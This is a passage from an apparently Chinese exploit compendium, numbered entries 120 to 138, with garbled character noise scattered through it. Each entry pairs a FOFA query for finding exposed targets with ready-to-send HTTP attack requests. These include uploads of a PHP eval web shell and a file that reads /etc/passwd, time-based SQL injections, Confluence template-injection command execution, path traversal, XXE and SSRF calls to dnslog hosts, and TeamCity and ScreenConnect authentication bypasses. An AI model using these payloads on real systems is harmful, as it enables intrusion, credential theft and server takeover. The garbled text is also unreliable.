Sec-Fetch-Mode: cors# u9 P$ Q7 B# y# R8 R9 G2 Q7 N" v, O* w
Sec-Fetch-Site: same-origin3 Q) A6 u7 k4 X/ W4 ^0 d0 ]
X-Forwarded-For: 1.1.1.1- ?/ Y; h& P, _
X-Originating-Ip: 1.1.1.1
* ~. r6 n9 O6 V: x9 y3 c% f: n& uX-Remote-Ip: 1.1.1.13 Y5 W7 J; D8 X0 J& J/ g
X-Remote-Addr: 1.1.1.1. b& v& S o9 |( y) }
Te: trailers
- h* e1 M# o7 w$ T9 `+ t1 bConnection: close- G: F1 V7 c: \ C$ c
' x4 b6 @- z; Z( }' A7 q. m
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
$ w( j- L* |$ A! e; u+ z: X
) D0 n Y4 f' R, T6 Y0 v, D6 ^
6 G: y& g' c( `# s3 A( Z/ ^120. 北京百绰智能S40管理平台导入web.php任意文件上传, T. n$ ]7 {) z& Z `4 d
CVE-2024-1253 Q; P# l) O6 x: a X8 @ l( i
FOFA:title="Smart管理平台"
; r4 U d1 h5 f' t' ^# UPOST /useratte/web.php? HTTP/1.1* R) W. x, z$ [0 R3 t% v
Host: ip:port
: I5 F; ^/ J/ OCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
) f5 Y+ c- P6 F7 F! c3 `' e1 JUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
( {3 S5 _6 |9 H6 F+ l6 Q c+ mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 J6 u ^- e5 `* |4 wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 [/ A7 K9 R- J3 X8 z" d
Accept-Encoding: gzip, deflate
! h2 y: D, R3 ~: H! ?! RContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
+ A% z w- L" V' EContent-Length: 597
. d, L' n8 O& T4 R$ s3 `. WOrigin: https://ip:port
/ j2 B5 _6 q1 j7 TReferer: https://ip:port/sysmanage/licence.php9 R- ^$ J( c# y" D) V( u6 [" W
Upgrade-Insecure-Requests: 18 m8 i- [4 q1 G5 {- l3 ^- s
Sec-Fetch-Dest: document
- ]: {. c) q: o/ g) n. ~8 A, |Sec-Fetch-Mode: navigate
: b+ \9 x/ ]3 E3 V& sSec-Fetch-Site: same-origin
! V6 o5 |- }! @ |. Y& wSec-Fetch-User: ?1; l/ ~( D) M$ [9 z' _
Te: trailers
! B; n; B* ?, ]Connection: close) }6 }) M7 L# h: p) F8 g1 k
! `0 Z6 b8 U) c% F
-----------------------------423289041236658752706300793289 O; M/ a. |5 s3 W+ t. G9 x/ p
Content-Disposition: form-data; name="file_upload"; filename="2.php"
; P8 p4 R+ i, v* k$ k y9 c, iContent-Type: application/octet-stream
# f- \$ E. P! H6 I4 o$ ^
. z% `9 H- K# c1 ]# W- I<?php phpinfo()?>
! A7 Y) O* P+ _-----------------------------42328904123665875270630079328" x/ g7 w% o; `+ Q) k/ o! {2 O
Content-Disposition: form-data; name="id_type"
) \$ l) q9 V/ ^: e% L# }, a6 O( y$ L
1; s& ?/ l- Q3 D. [: W7 ~: v2 F3 c$ T
-----------------------------423289041236658752706300793285 z7 |# V' O- K# K1 ]' i+ i, u9 @
Content-Disposition: form-data; name="1_ck"
) [- ~, }, k( _' P* u/ J3 D$ I
' f Q& _! H) K1_radhttp8 f6 u# K/ U9 R* f
-----------------------------42328904123665875270630079328 \& K; S v# u- F
Content-Disposition: form-data; name="mode"
+ [* J( b) b7 {8 ~! e3 t# B: g$ [$ Z/ m8 e; u& d. M% O3 O
import
, v2 k, z8 z* r* M. M0 U3 R! _-----------------------------42328904123665875270630079328
1 s$ i2 R# ]$ C' N: t1 i+ R0 n# R0 l. g1 s5 Z
9 ]4 s0 z/ G; i6 B, I8 x( A9 _# ]. r文件路径/upload/2.php; \. z9 |% N; V. o$ l
a9 d# T6 z& Z9 a: K: b
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
) c, f# c8 W: ^# nCVE-2024-1918
. O3 L; @* y" T0 h, L+ NFOFA:title="Smart管理平台"
3 f1 g$ k6 p6 u; t1 A( mPOST /useratte/userattestation.php HTTP/1.1: K/ d: f* O' z
Host: 192.168.40.130:8443
, }# O+ F3 G3 Q5 F2 y2 l, dCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
* Z! `# Y3 s h5 N9 rUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
9 r4 L/ u( v' ~0 B% ~1 L" sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! f( a# {2 W% z- Y) L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 M8 j( M. l/ d [2 Y* o
Accept-Encoding: gzip, deflate1 U: Z/ A" h4 M& s2 [8 A; D
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
4 A1 w& X4 c. p4 Q5 `Content-Length: 5929 m* x8 W. E' j: q1 B3 C1 J) ~
Origin: https://192.168.40.130:8443
8 ]4 ~$ D1 [, m. W9 K8 @2 n9 k6 mUpgrade-Insecure-Requests: 1
4 X' h3 x* \2 d, L: q/ aSec-Fetch-Dest: document
m! R, O3 s# A3 }Sec-Fetch-Mode: navigate
4 @( `! N% R# n$ k. m! DSec-Fetch-Site: same-origin2 b' R- o; n; A% M
Sec-Fetch-User: ?1% @" ^2 O8 w, G
Te: trailers
# s, [5 p2 m, g/ h$ sConnection: close
) y" U" N5 ?* p3 W
9 K/ `, F6 S5 G" ^$ n0 h: e0 z: x-----------------------------42328904123665875270630079328 y, O* A( V5 t
Content-Disposition: form-data; name="web_img"; filename="1.php" Z X7 f1 j- {2 [/ {- b
Content-Type: application/octet-stream
9 m& \3 Q4 U! g7 \; W7 F6 i% {+ L8 M. X& U- r# q$ ?1 n" ]
<?php phpinfo();?>
| w. c- g, {3 n-----------------------------42328904123665875270630079328
0 M' ?# i$ F9 F, j" U, }* q* EContent-Disposition: form-data; name="id_type"- c$ A3 D: I- u, x1 d. s( c" \3 h
) k" ?% ?: s& f9 o
1
; @2 X" |5 p$ _! x. J# n-----------------------------42328904123665875270630079328
1 G4 R$ H9 O; s/ Z. {* }Content-Disposition: form-data; name="1_ck". h, e' I- r$ t; M9 H& n. L: V' x
3 }4 P. R$ h" L
1_radhttp) @( U9 X! B% b+ X7 y$ P5 K2 ^
-----------------------------42328904123665875270630079328
, F1 ~3 [3 e5 Q7 V p1 x$ q% VContent-Disposition: form-data; name="hidwel"
% U: n* ^- p" u6 ^% |6 k7 h3 l/ X( t& j
set
4 L; a- v! l( v* y) [8 b. Q" V-----------------------------42328904123665875270630079328
6 O5 w$ k6 J! b" \( p
& ~( z/ H# r. ~( X8 h2 x0 x5 I1 m( M
boot/web/upload/weblogo/1.php5 c! P. s) q' c& t, ]6 l }
' q1 i, F' K; i( F4 {" }122. 北京百绰智能s200管理平台/importexport.php sql注入; c, G! k9 x: i7 N) c; c% C e, m
CVE-2024-27718FOFA:title="Smart管理平台"( @ ~, b) [; y& T" O! Q
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
6 G: B8 |9 P$ u. U9 d" [GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
: }7 ~$ K/ ]: }$ M6 d' JHost: x.x.x.x0 c/ B- y) r- Q g3 K; x; [
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0% z7 V' Z! f/ N. z3 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 f$ b/ y+ L* d+ a; _2 I3 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 P/ |8 M- X+ W) [3 C, y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' I: z1 |, E, T, L4 K: r! j% D+ G
Accept-Encoding: gzip, deflate, br% ?5 K/ J7 e" Z8 d x* a
Upgrade-Insecure-Requests: 1
; I0 K" k Z) X% f9 bSec-Fetch-Dest: document
2 K$ ~+ X% P9 b3 d" i+ }Sec-Fetch-Mode: navigate( L* e8 O) t4 F- T
Sec-Fetch-Site: none$ P% t! } B1 N
Sec-Fetch-User: ?1
+ J) p1 W$ `3 @+ }' a; g( TTe: trailers
, ?' @: m0 a! K9 tConnection: close/ N& }* Z/ L9 [* A/ b. O0 N
4 j) g4 `: ~. Y7 ]8 z; v: ^2 u1 A" {* ]5 F5 N* q
123. Atlassian Confluence 模板注入代码执行
7 h8 e% Y0 H0 }$ Q5 G8 WFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"7 v5 L2 q, ?, v/ i9 N/ x
POST /template/aui/text-inline.vm HTTP/1.1. Z+ S9 y4 N0 o4 B
Host: localhost:8090
/ D5 r/ _, S+ F$ a6 LAccept-Encoding: gzip, deflate, br
! n8 G) e( A( M0 q9 s% oAccept: */*9 h9 W# i3 y/ S) s
Accept-Language: en-US;q=0.9,en;q=0.8
& F% t% k* ]3 L# g% P4 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
8 J! u% a$ f/ S$ ] a1 N6 m W) iConnection: close- Y- Q2 [/ k" d
Content-Type: application/x-www-form-urlencoded7 G1 ^5 G% k: J8 _& Q2 _! l5 r; y, ?
, }6 P$ v9 S; Hlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"})): `' c9 X/ @* q& M, T
+ o4 n/ t5 ]5 x0 D) Z
( m$ y8 F& m" W' o1 \# N, [124. 湖南建研工程质量检测系统任意文件上传0 r7 v% g7 d- g8 X* h" l
FOFA:body="/Content/Theme/Standard/webSite/login.css"
1 L0 q) n5 v1 r) o# YPOST /Scripts/admintool?type=updatefile HTTP/1.1
! X( U9 ^8 p. |1 d$ V4 e4 c: \- V2 `6 ZHost: 192.168.40.130:8282
4 U: T S3 G4 \4 a I7 n9 YUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
2 G1 _+ n; k4 D2 g" ~Content-Length: 72
; `9 ~6 |& j1 O3 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
: [" K. n! s% L& M4 D2 fAccept-Encoding: gzip, deflate, br
, Z5 }- @- d) Z5 V: ]! nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 D4 H3 o0 f* J7 YConnection: close
" D3 { q4 T# @9 { X6 EContent-Type: application/x-www-form-urlencoded( H! k; D% p, p! N0 K/ u% e
" z! G4 O, l; b( I4 [$ a8 rfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>' d Q6 u& H) K/ Y; o/ A
- c+ L/ h. v# q" N; h6 G) S
# h& C" k7 `2 ~) u
http://192.168.40.130:8282/Scripts/abcgcg.aspx
! n3 ~2 ^/ I* f9 `3 T; @& n3 @
' A% g; \# D* M7 V4 j' D125. ConnectWise ScreenConnect身份验证绕过
) a2 G7 B# j8 t" ~2 ECVE-2024-1709* w4 b- r( [# H2 u" E7 |# }
FOFA:icon_hash="-82958153"
* \; Q! q2 j1 S* `: G. P: R$ thttps://github.com/watchtowrlabs ... bypass-add-user-poc
0 `( L( ^* W) }% C8 C
* F6 r9 Q0 G0 @& H8 R7 M- y7 M6 `
使用方法' B8 T) _7 D5 b: x
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!4 Y$ p7 I2 A% g* F# G0 ]7 D ]0 C
) I- j8 K5 C3 g* [# v8 J2 E. ?
4 @3 p0 s* y: ^, u创建好用户后直接登录后台,可以执行系统命令。9 u+ L3 J5 n1 d8 c
# P+ ?' I. @: v- X8 r+ i3 V$ ?126. Aiohttp 路径遍历
- j4 P' [# j' V& I" d+ O; \FOFA:title=="ComfyUI") a; r! O- T( J0 s3 W. H! j
GET /static/../../../../../etc/passwd HTTP/1.1) C3 w7 R" t% u2 n v
Host: x.x.x.x
% N+ G2 |, e y( b9 ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" K5 l, s4 I( }: G# Y
Connection: close' j* N7 [3 P# ]- t; [9 p
Accept: */*
7 k" |# q7 S% l3 [* y% q' |Accept-Language: en
6 ~8 y% r5 }! }3 VAccept-Encoding: gzip
1 }) Y, m' d0 `% s4 m, s* M! T. c- q, p6 e6 T: M( m
& K6 A- A2 `. {& m b/ x127. 广联达Linkworks DataExchange.ashx XXE
7 p5 d% Q! N4 f& U1 N6 vFOFA:body="Services/Identification/login.ashx" 1 j( _9 B A- ?2 ~+ G! o% ^: Y
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
0 s* ^5 p& {! f3 b: q- s* sHost: 192.168.40.130:8888
- U+ O+ E' D- E- ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
. d/ B: U+ v( _7 nContent-Length: 415" @$ u. D& E6 [" A3 h: |+ W: g% a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 Y+ a s6 T9 u$ n7 Y# p
Accept-Encoding: gzip, deflate
6 N$ T* S7 e7 Y* W' MAccept-Language: zh-CN,zh;q=0.9
( d& f. [2 P) x9 UConnection: close* z+ U$ L/ h4 ^: r) Y; V
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
T* `- U7 i* a! Y4 e- C8 ?Purpose: prefetch
, D) @; Z8 j; N! Z9 ?; tSec-Purpose: prefetch;prerender
" X+ E5 D/ k; x; r
& ^: X0 t, [( y) W, [: }------WebKitFormBoundaryJGgV5l5ta05yAIe04 X( Y& L& k" Q6 _
Content-Disposition: form-data;name="SystemName". F; X* K8 t( ~! v) ?' D1 q% j/ D
" \ L7 u$ H% C7 x1 l6 CBIM9 X0 [ n6 Y9 N# ?4 H; J
------WebKitFormBoundaryJGgV5l5ta05yAIe0
' q. U! ~# r8 t* {Content-Disposition: form-data;name="Params"
/ z/ p1 O+ Q2 A- j) u6 b$ rContent-Type: text/plain. O1 \% W; T( o# V5 e( ]
2 e7 j( c- e! r<?xml version="1.0" encoding="UTF-8"?>/ f2 A" z& q: S& J+ x5 [8 r, I) i
<!DOCTYPE test [
4 n+ g9 A7 U7 C; h' U) e, y<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">1 x7 z' @/ h6 Z, }
]
, o5 |) s* u) g+ P$ ]; w: H- z+ ^; z4 @$ x, b>6 c6 F: g4 m: a% i5 H
<test>&t;</test>
/ L+ Y0 ?2 c& N. |1 u% A, M------WebKitFormBoundaryJGgV5l5ta05yAIe0--8 t! m, ]$ {4 z6 \0 }/ H
" F4 ?& G+ C* p# P0 |7 w9 {- B% T6 i) ] r; s2 l
+ P! T x% j3 B128. Adobe ColdFusion 反序列化, Y, P( \/ j2 Q' s4 l! n1 y. I' n
CVE-2023-38203
/ q: l/ o3 K- f! ]# J5 FAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
* D# b. Z8 K( u A7 @0 B' V8 K' }FOFA:app="Adobe-ColdFusion"5 M$ K* T; d( n+ w
PAYLOAD' E; q. ~4 I0 J# o! V& V" b% J
0 I) j, a. w; G9 t
129. Adobe ColdFusion 任意文件读取
0 |9 @. g( C/ v |' S) Z) ZCVE-2024-20767/ t y: @ u# `
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"0 f: A* f: R% G( }6 w1 f+ |
第一步,获取uuid1 l# C4 e' T& }1 D% z$ W
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
0 j9 m4 g) M1 m7 G) vHost: x.x.x.x U4 t2 S% n( i; c% k( @4 W1 p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
0 d, s0 n6 w( e' vAccept: */*
9 ?7 K) `# l: ?$ E1 `: \Accept-Encoding: gzip, deflate8 F [2 L4 Z: i/ t6 k3 E
Connection: close
. N, a( l1 u1 F$ h- z* k5 b8 S& G) J9 p3 a9 z' @1 B* h7 b
" s: o9 F( l* @7 I2 b) b第二步,读取/etc/passwd文件' d' _" R, x: d% L4 X
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1! p/ }( a( h9 o7 ^) o$ c# t* S' r
Host: x.x.x.x
& `& n+ q- \$ q* j8 q k3 y' g% CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36) o* K; K, j3 M& Y( A
Accept: */*/ k$ I2 ]5 Q0 a3 I& o% A$ d
Accept-Encoding: gzip, deflate
' [5 n- u5 W5 T2 S4 ?# `3 b3 z) \Connection: close
* d4 E0 |, H) e4 vuuid: 85f60018-a654-4410-a783-f81cbd5000b9
7 f* ^& v/ k, l: Q; E% b4 D( O/ c; V' A4 K4 W
+ B; z+ q8 p. G3 Z5 a
130. Laykefu客服系统任意文件上传
' r! {/ x' I( j$ t5 \+ m) B9 vFOFA:icon_hash="-334624619"
- j) Y7 F8 f+ f6 S/ JPOST /admin/users/upavatar.html HTTP/1.1- Y% h- W: Z, y! I
Host: 127.0.0.1
) b: Q* _* j1 Z) T3 xAccept: application/json, text/javascript, */*; q=0.01
8 c, ~" z* }: ?5 h# s! g9 F: s0 d9 dX-Requested-With: XMLHttpRequest, n3 u) y2 P& y3 m& B5 h$ V8 ^
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.261 }( `$ w, }& f4 R) r
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
% k/ C+ @) S/ {& o# k6 [+ BAccept-Encoding: gzip, deflate
1 U; W9 \" ? E1 B5 t2 }Accept-Language: zh-CN,zh;q=0.9
4 w) [' P4 [# A9 m; ]9 X: X8 `" UCookie: user_name=1; user_id=3
5 V1 }$ n& G* U! o c3 HConnection: close
8 v+ l) K- O% g3 w$ A
9 s; m' J4 o" Y7 r5 A4 H# S' E------WebKitFormBoundary3OCVBiwBVsNuB2kR1 F. J9 p1 F# O' w. j0 A( `
Content-Disposition: form-data; name="file"; filename="1.php"7 Z. V8 c5 ?4 n9 }+ J0 T
Content-Type: image/png
, ~) U* |' L8 g/ ?* }+ E ; p9 K* Y- ?8 H4 E. w; @( C
<?php phpinfo();@eval($_POST['sec']);?>9 [# G6 O/ O0 c- _, Z0 I- o, S
------WebKitFormBoundary3OCVBiwBVsNuB2kR--! G4 W$ x2 c. `
- d. m+ C0 G0 j0 H: F
4 P# e: u& Q' W/ I) b7 W% t131. Mini-Tmall <=20231017 SQL注入0 f6 K: L4 I! D3 [. f/ o% w
FOFA:icon_hash="-2087517259"
% ^9 N. p O& L后台地址:http://localhost:8080/tmall/admin
% @% Y. Z' T' M7 M( I: D' ]http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
% s" r+ D/ n8 N& d0 J* s+ r9 Y, R* y8 j- f9 i3 Y; X. H" }/ H
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过: \, D* A8 M: j- t* F: z0 ^ }8 N
CVE-2024-27198
3 R: A0 v6 m: sFOFA:body="Log in to TeamCity"* H9 h, n% ?+ g2 A& o. w1 m
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.18 n T# |) M9 o" W$ `6 I
Host: 192.168.40.130:8111
2 M! g6 G) Z1 s' {& \5 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.363 ?* @ F# x5 ~9 d6 X9 Y5 r7 ^8 k
Accept: */*
" D3 }/ G$ R; o {" o% ^Content-Type: application/json
5 i( D! y9 O+ ^& I5 IAccept-Encoding: gzip, deflate4 n2 D! r( [$ ^7 h6 O' G4 h
/ a# R1 a& `+ s/ Q# S" [{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
- X0 N Z: i R$ ~
+ R: f* l3 }/ H! S* e& u' @
9 q, M" [7 k* O. d9 A# bCVE-2024-27199
. _/ X, r5 g' _/res/../admin/diagnostic.jsp" V- ] i! K9 W; A0 Y7 x
/.well-known/acme-challenge/../../admin/diagnostic.jsp
- M6 A. ?: \6 D# b/update/../admin/diagnostic.jsp
: S- ]! P7 j2 W% Y+ }7 c/ h7 t/ B+ G5 [
8 A$ B7 J7 L8 d: b( U# E4 g' ^CVE-2024-27198-RCE.py
! ~8 @& i3 D# N6 x9 X ]
4 L6 H; |+ D) r. i$ ^0 C2 X2 F% g133. H5 云商城 file.php 文件上传# z" E, Q& B8 E$ V) y
FOFA:body="/public/qbsp.php"
5 a$ H# w* p) I, Y& t$ z3 v/ ?: dPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
& S9 J! e. m: E4 i/ T, G" t+ tHost: your-ip. @' c1 F- h( u6 A& Q- i, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.362 E/ {& h# }/ |" F! P0 C. }3 V
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx/ f) p# P1 o9 m! l
8 P2 o* H! Q- r# q% c( x
------WebKitFormBoundaryFQqYtrIWb8iBxUCx: Y/ X$ k% Y& {9 |0 [
Content-Disposition: form-data; name="file"; filename="rce.php"
9 _& [/ G: E% Y! r5 UContent-Type: application/octet-stream) ?% |! z' h; C7 M4 k& D8 ]
4 W/ E6 L- _7 A4 S1 m) t2 ~, R; K<?php system("cat /etc/passwd");unlink(__FILE__);?>
! s3 [8 k2 u3 \+ n' b) M/ Q------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
- Q) M% }) \7 ]* Q5 G0 x+ h- s3 W1 z! b0 t
, S; x" C# A! M
" [% r; ^6 j( Y8 g& d' C: ?8 V- M134. 网康NS-ASG应用安全网关index.php sql注入
6 P2 Y6 D# H/ r+ qCVE-2024-2330
6 J/ Z/ ^9 i! M* O2 Z1 I- YNetentsec NS-ASG Application Security Gateway 6.3版本; N7 L0 M$ u P4 l
FOFA:app="网康科技-NS-ASG安全网关"; I5 w" y' X# G5 |& Z: D
POST /protocol/index.php HTTP/1.1# z- E. c! x. M6 o( x1 T4 c
Host: x.x.x.x
( F- n& B8 n9 {% O. {* P H' MCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de+ b8 V6 W0 w! F8 o6 n% S! V1 R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
; {' c0 P4 v4 ?5 U$ J; Z( OAccept: */*7 ~3 p* v; T! x+ _" E6 |, b4 I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 a* F# Q' T* l% p0 v/ `* h) s# }Accept-Encoding: gzip, deflate3 p6 o9 c m' O# C
Sec-Fetch-Dest: empty
! y3 |5 Q k5 A- v% sSec-Fetch-Mode: cors
8 ]% Q# k/ {8 x9 a# @Sec-Fetch-Site: same-origin( H5 N- t8 A3 ~# k- u
Te: trailers5 d: W, x% v) V3 p* I
Connection: close. F; b/ Q- ^$ s" {+ g: p: F( Q
Content-Type: application/x-www-form-urlencoded
7 `( V8 r: O6 ~. N. V6 oContent-Length: 263
! _. Y* {* M* f3 Q5 L
+ N6 m- T% [% E8 Kjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}4 v; I5 M$ F& r/ n% k: e" f2 O( P' Y$ y
/ L( k, i# b' F5 k1 w8 A
0 L/ t; l& ], m3 i: j% `
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
7 v5 ?4 `* V/ c$ n/ ^7 |' nCVE-2024-2022
* q. a# Z( ?7 N& Y! ?; ^Netentsec NS-ASG Application Security Gateway 6.3版本7 F; @" X+ _% c+ D" T# a
FOFA:app="网康科技-NS-ASG安全网关"
/ O" W% D2 [4 H2 d' Y) AGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
3 P. F4 |5 D+ D [. e0 z0 t8 kHost: x.x.x.x$ c- F5 L0 \9 L( q+ K6 y, A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36/ k& ?1 p& E3 E3 x) @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. U: ^: v4 r% s) X& x: ?6 S
Accept-Encoding: gzip, deflate9 k' a* w& ~& w& d
Accept-Language: zh-CN,zh;q=0.9
1 ^+ ~8 V$ Q9 U" V. Y; Q) `Connection: close
; e1 [1 `+ M0 p+ w, `- n1 g4 c0 H; `! N/ J& ]
6 L! O8 D- z7 B! U9 G, ]136. NextChat cors SSRF: @' m2 w) N% a! z R/ E
CVE-2023-49785
2 V: N: N) k4 ~0 |& f4 y# a: R- wFOFA:title="NextChat"
9 ^5 K' ]- d. u4 ~$ \) {, kGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.13 q% T! h% I0 z- z. K3 |/ [
Host: x.x.x.x:10000! t& w$ R: B0 n ?" c0 X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ e3 [7 B( ~7 ?' R- g7 OConnection: close
) y: A- q" e F% f3 m" PAccept: */*! @/ J1 r3 q7 n) X
Accept-Language: en( E' f3 B, y" k; S/ j: a* c$ U
Accept-Encoding: gzip
. U5 d3 c2 ?7 a7 D8 B& M+ P+ f
, Q8 n. K6 p- P- |5 `$ a N/ u
6 ]" X- W3 O3 B& v U137. 福建科立迅通信指挥调度平台down_file.php sql注入: u- O; b5 \" R# m6 M
CVE-2024-2620
! ^; S$ [5 K. {8 FFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
" n/ _7 L4 K2 Q" {* P! FGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
, I0 y# w: ~+ q4 E3 oHost: x.x.x.x
, M4 {8 d# G* Z1 C! oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.02 U, V- \0 P4 z9 ?& V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 l6 Y, @, n7 H1 f* }3 NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( l5 P* a: s4 j- `$ ]/ T2 FAccept-Encoding: gzip, deflate, br1 T- ]2 O9 v4 G1 O
Connection: close+ ?$ B( Y7 m' c$ |
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj6 S3 K( b4 h) o/ `) K
Upgrade-Insecure-Requests: 1$ g1 t, E+ H6 A3 [9 s- S
5 ]; N: R6 U7 t3 f' b& g
! ~) Y3 I0 N, x7 g
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
" a J8 @7 D6 G0 VCVE-2024-2621
* Q" M$ G$ W; J- oFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"1 m" P( W3 e% M; J
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1; S8 D0 H& x" z) e" k# W8 }) f. ~
Host: x.x.x.x! M/ e7 B4 M s+ U* r9 M' p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, j0 u% [. o3 f
